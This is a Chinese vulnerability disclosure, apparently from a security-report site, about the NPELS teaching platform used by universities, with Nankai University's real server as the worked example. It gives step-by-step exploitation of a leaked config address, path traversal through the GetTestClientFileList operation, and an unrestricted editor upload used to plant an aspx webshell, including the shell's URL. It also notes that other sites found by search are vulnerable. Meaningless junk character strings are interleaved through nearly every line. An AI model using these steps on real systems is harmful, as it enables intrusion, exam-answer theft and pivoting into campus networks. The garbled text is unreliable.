好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中. m2 X' p" `/ n. a$ H @% A
- R8 J" B, V6 N6 p2 u
详细说明:
( K; k7 Q# K! K0 K
( m$ g+ U1 [) V以南开大学的为例:
. Y2 Q9 K' @' E6 g9 D+ I2 i8 ?http://222.30.60.3/NPELS
% }# g+ ^% F/ I. ~NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
- o5 ? |# s$ k" _. J<setting name="Update_CommonSvr_CommonService" serializeAs="String">
( N2 X( \+ J8 f# H6 j: D1 p" W<value>http://222.30.60.3/NPELS/CommonService.asmx</value>0 d4 L: Y3 I2 r4 M# J
</setting>
' p3 m" A6 X, V, F' M8 v8 v* y8 x及版本号
9 Z4 T3 m9 H6 k+ R+ T. h<add key="TVersion" value="1, 0, 0, 2187">
1 v4 C- m4 m6 t* ~/ n: ]4 W6 A</add>7 z5 n) f2 J" O- o0 y# F% g7 V
直接访问/ @! s7 s9 b8 C1 K2 u5 O
http://222.30.60.3/NPELS/CommonService.asmx. v0 s0 z3 `) } p* W3 \
使用GetTestClientFileList操作,直接 HTTP GET 列目录:( Y# }! B2 s6 f, g$ m4 \) X5 r- @% y
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
( M0 v% z& h$ z4 [( j, Z! f进一步列目录(返回的网页很大,可以直接 wget 下来)/ ^6 T- u5 U7 K7 { u$ g
http://222.30.60.3/NPELS/CommonS ... List?version=../../) ?+ v( n& A7 A5 h6 }* [' e3 A
" y% l9 _; p2 v' J# i, w1 x/ @
发现" J- t" n5 y" J+ T: V4 m3 m
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm% x% r7 h) \7 P; W
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
_ s2 M; c( l( B( j. i4 ~上传后继续列目录找到木马地址直接访问即可
7 @& x; t- |; i
$ i# T; j7 Y J7 q4 q1 R- QOOXX
; o/ Y& | M, X) b6 ]- l$ r
( S3 y3 m0 A* {; m/ L; S* GGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
3 @- r; p3 x5 ?+ V& I0 Z漏洞证明:
4 X, y1 c1 y$ @6 e' s, ~
2 y- x) J2 a8 q2 t3 x+ R& S) D- M0 F, S列目录:
4 H! z6 w5 n3 G6 G6 W2 bhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
$ Y6 c% F6 \9 e! e& l- y文件上传:0 A# u4 r' {3 ~1 |1 y) t* X0 O. n
http://222.30.60.3/npelsv/editor/editor.htm
$ `0 \8 T1 l: z1 K2 w
5 d5 Z& f6 ^4 F( t G, `/ M上传木马:7 F, N% G6 |9 z; m
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
+ @2 `. J5 U3 L) G- n+ m. v$ R ' e' B) Y n4 o& ~* n/ _
修复方案:
$ I$ r6 d. y/ ?( A$ e好像考试系统必须使用 CommonService.asmx6 b- L' t0 @+ q7 v: A* j0 i
最好配置文件加密或者用别的方式不让它泄露出来& H- q5 K" \/ |- r) R
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
; B; b9 M3 A/ F6 [4 u |